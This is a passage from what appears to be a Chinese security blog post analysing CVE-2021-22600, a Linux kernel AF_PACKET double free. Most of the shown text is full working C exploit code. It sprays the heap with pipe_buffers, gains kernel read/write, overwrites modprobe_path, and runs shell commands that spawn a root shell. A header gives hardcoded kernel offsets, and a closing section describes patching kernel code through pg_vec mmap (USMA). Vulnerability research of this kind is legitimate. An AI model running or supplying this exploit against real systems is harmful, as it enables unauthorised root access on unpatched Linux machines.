__pfn_to_page((virt_to_phys(ctx, kaddr) >> 12) * 0x40);
ctx->corrupt_buf->offset = 0;
ctx->corrupt_buf->len = (unsigned int)(kaddr & 0xfffLL);

CHECK_V(write(ctx->corrupting->w, (void *)ctx->corrupting_buf, 0x80), 0x80);
CHECK_V(write(ctx->corrupt->w, uaddr, len), len);
}

static void find_kvoff(exploit_ctx *ctx) {
uint64_t startup_qw = 0;
while (1) {
kread(ctx, ctx->page_offset + ctx->kvoff, (char *)&startup_qw, 8, KHEAP);
if (startup_qw != STARTUP_QW) {
ctx->kvoff += 0x10000;
continue;
}
break;
}
printf("[+] Kvoff: %#lx\n", ctx->kvoff);
}

static void exploit() {
int fd;
exploit_ctx *ctx;
struct pipe_rw *pipes, *pipes2;

setup_sandbox();
close_prev_fds();

fd = CHECK(socket(AF_PACKET, SOCK_RAW, 0));
ctx = calloc(1, sizeof(*ctx));

/**
* Create NUM_PIPES pipefds and resize each to 0x4000.
* The pipe_inode_info structure is allocated for each pipefd.
* This structure stores a circular list of pipe_buffer structures each
* consisting of a page for storing associated data. The size of the circular
* list is sizeof(pipe_buffer) * num_pages = 64 * 4 = 256. All pipe_buffers
* are allocated from the kmalloc-256 cache after the resize.
**/

pipes = alloc_pipes(ctx, NUM_PIPES, true);

// Swicth to TPACKET_V3
CHECK(setsockopt(fd, SOL_PACKET, PACKET_VERSION, &(int){TPACKET_V3},
sizeof(int)));

// Allocate rx_owner_map - kmalloc-2048
union tpacket_req_u treq = {};
treq.req3.tp_block_size = 0x1000;
treq.req3.tp_block_nr = 0x410 / 8;
treq.req3.tp_frame_size = 0x1000;
treq.req3.tp_frame_nr = 0x410 / 8;
CHECK(setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &treq, sizeof(treq)));

/**
* Allocate pipe_buffers and resize to 0x20000. (size = 64 * 32 = 2048)
* Buddy allocator allocates new slabs for kmalloc-2048.
**/

pipes2 = alloc_pipes(ctx, 0x90, false);
for (int i = 0; i < 0x90; ++i)
setpipe_sz(&pipes2[i], pipesz(2048));

/**
* Free pipe_buffers for reallocation.
* Don't free all so that the slab doesn't get freed.
**/
for (int i = 0; i < 0x90; ++i)
if (i & 4)
release_pipe(&pipes2[i]);

// Free rx_owner_map - kmalloc-2048
memset(&treq, 0, sizeof(treq));
CHECK(setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &treq, sizeof(treq)));

// Realloc rx_owner_map with pipe_buffer
for (int i = 0; i < NUM_PIPES - 0x30; ++i)
setpipe_sz(&pipes[i], pipesz(2048));

/**
* Release the first page for each pipe.
* This is cached at pipe_inode_info->tmp_page.
**/

for (int i = 0; i < NUM_PIPES - 0x30; ++i)
CHECK_V(read(pipes[i].r, ctx->pipe_data, 0x1000), 0x1000);

// Swicth to TPACKET_V2
CHECK(setsockopt(fd, SOL_PACKET, PACKET_VERSION, &(int){TPACKET_V2},
sizeof(int)));

/**
* Double free rx_owner_map
* Hopefully, this was reallocated with the pipe_buffer spray earlier.
**/
treq.req3.tp_block_size = 0x1000;
treq.req3.tp_block_nr = 1;
treq.req3.tp_frame_size = 0x1000;
treq.req3.tp_frame_nr = 1;
CHECK(setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &treq, sizeof(treq)));

// Realloc the pipe_buffer again
for (int i = NUM_PIPES - 0x30; i < NUM_PIPES; ++i)
setpipe_sz(&pipes[i], pipesz(2048));

memset(ctx->pipe_data, 0, 0x1000);
for (int i = NUM_PIPES - 0x30; i < NUM_PIPES; ++i) {
CHECK(write(pipes[i].w, ctx->pipe_data, 0x1000 - 2));
CHECK(write(pipes[i].w, ctx->pipe_data, 0x100));
ctx->pipe_data[0]++;
}

uint64_t corrupt_pipe_idx;
size_t len;

// Find the corrupted pipe_buffer using the length
for (int i = 0; i < NUM_PIPES - 0x30; ++i) {
len = fionread(pipes[i].r);
if (len != 0x1004) {
CHECK(read(pipes[i].r, &corrupt_pipe_idx, 8));
ctx->corrupt = &pipes[i];
break;
}
}

corrupt_pipe_idx += NUM_PIPES - 0x30;

// Release unused pipes
for (int i = 0; i < 0x90; ++i)
if (!(i & 4))
release_pipe(&pipes2[i]);

for (int i = 0; i < NUM_PIPES; ++i) {
if (ctx->corrupt == &pipes[i] || corrupt_pipe_idx == i)
continue;
release_pipe(&pipes[i]);
}

// Two pipe_buffers now have reference to the same page. Release the dup
// pipe_buffer to free the page.
release_dup_page(ctx, ctx->corrupt, &pipes[corrupt_pipe_idx]);
// Reclaim the freed page with a eventfd spray.
eventfd_reclaim(ctx);
realloc_page(ctx);

setup_rw(ctx);
find_kvoff(ctx);
kwrite(ctx, ctx->kbase + MODPROBE_OFF, "/tmp/x", 7, KIMG);

CHECK(write(fpair[1], "a", 1));
while (1)
sleep(0x1000000);
}

void modprobe_to_root() {
system("echo '#!/bin/sh' > /tmp/x; echo 'setsid cttyhack setuidgid 0 "
"/bin/sh' >> /tmp/x");
system("chmod +x /tmp/x");
system("echo -ne '\xff\xff\xff\xff' > /tmp/trigger && chmod 777 "
"/tmp/trigger && /tmp/trigger");
system("sh");
}

int main(void) {
int pid;
char tmp;

CHECK(pipe(fpair));
pid = fork();
if (!pid) {
exploit();
exit(0);
}

read(fpair[0], &tmp, 1);
modprobe_to_root();
}

exploit.h

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#ifndef EXPLOIT_H
#define EXPLOIT_H
#include <stdint.h>

#define CHECK(e) \
({ \
typeof(e) e_ = (e); \
(e_ >= 0) ? e_ : ({ \
perror(#e); \
exit(e_); \
1; \
}); \
})

#define CHECK_V(e, v) \
({ \
typeof(e) e_ = (e); \
(e_ == v) ? e_ : ({ \
perror(#e); \
exit(e_); \
1; \
}); \
})

#define __START_KERNEL_map 0xffffffff80000000UL
#define STARTUP_QW 0xe800a03f51258d48
#define pipesz(kmsz) ((kmsz / 64) * 0x1000)
#define NUM_PIPES 0x120
#define NUM_EVFD 0x4000
#define PBUF_OPS_OFF (0xffffffffa8014100ULL - 0xffffffffa7800000ULL)
#define MODPROBE_OFF (0xffffffff8da398c0 - 0xffffffff8d000000)

// https://elixir.bootlin.com/linux/v4.14.190/source/include/linux/pipe_fs_i.h#L21
struct pipe_buffer {
uint64_t page;
unsigned int offset, len;
uint64_t ops;
unsigned int flags;
unsigned long private;
};

struct pipe_rw {
int r, w;
};

enum ktype { KHEAP, KIMG };

typedef struct exploit_ctx {
union {
unsigned char *pipe_data;
uint64_t *pipe_data_qw;
struct pipe_buffer *pbuf;
};
struct pipe_rw *corrupt;
struct pipe_rw *corrupting;
struct pipe_buffer *corrupting_buf;
struct pipe_buffer *corrupt_buf;
struct pipe_rw *pipes;
int evfds[NUM_EVFD];
int eventfd_idx;
uint64_t page_addr;
uint64_t page_offset;
uint64_t pbuf_ops;
uint64_t tmp_page;
uint64_t vmemmap_base;
uint64_t kbase;
uint64_t kvoff;
} exploit_ctx;

static void exploit();

#endif

0x05.延申利用手法

先前就有提到过,pg_vec是直接通过GPF_KERNEL标志从堆块中申请的,所以当存在堆UAF或者溢出时的漏洞时,可以修改pg_vec,再利用mmap将pg_vec对应的内核内存映射到用户空间,从而通过修改用户空间映射的虚拟地址,修改内核内存。

这里的映射有个前提,映射的地址会检查page是否为匿名页,是否为Slab子系统分配的页,以及page是否含有type。

image-20241027212111431

type类型如下,PG_buddy为伙伴系统中的页,PG_offline为内存交换出去的页,PG_table为用作页表的页,PG_guard为用作内存屏障的页。

image-20241027212322879

可以看到如果传入的page为内核代码段的页,以上的检查全都可以绕过。

以此我们能利用pg_vec修改内核代码段,可以修改__sys_setresuid函数将校验逻辑修改实现提权。

image-20241027212659321

  • Title: CVE-2021-22600 Linux内核提权漏洞分析及其延申利用手法(USMA)研究
  • Author: 0rb1t
  • Created at : 2024-10-27 15:53:47
  • Updated at : 2024-11-11 21:27:50
  • Link: https://redefine.ohevan.com/2024/10/27/CVE-2021-22600-Linux内核提权漏洞分析及其延申利用手法-USMA-研究/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
CVE-2021-22600 Linux内核提权漏洞分析及其延申利用手法(USMA)研究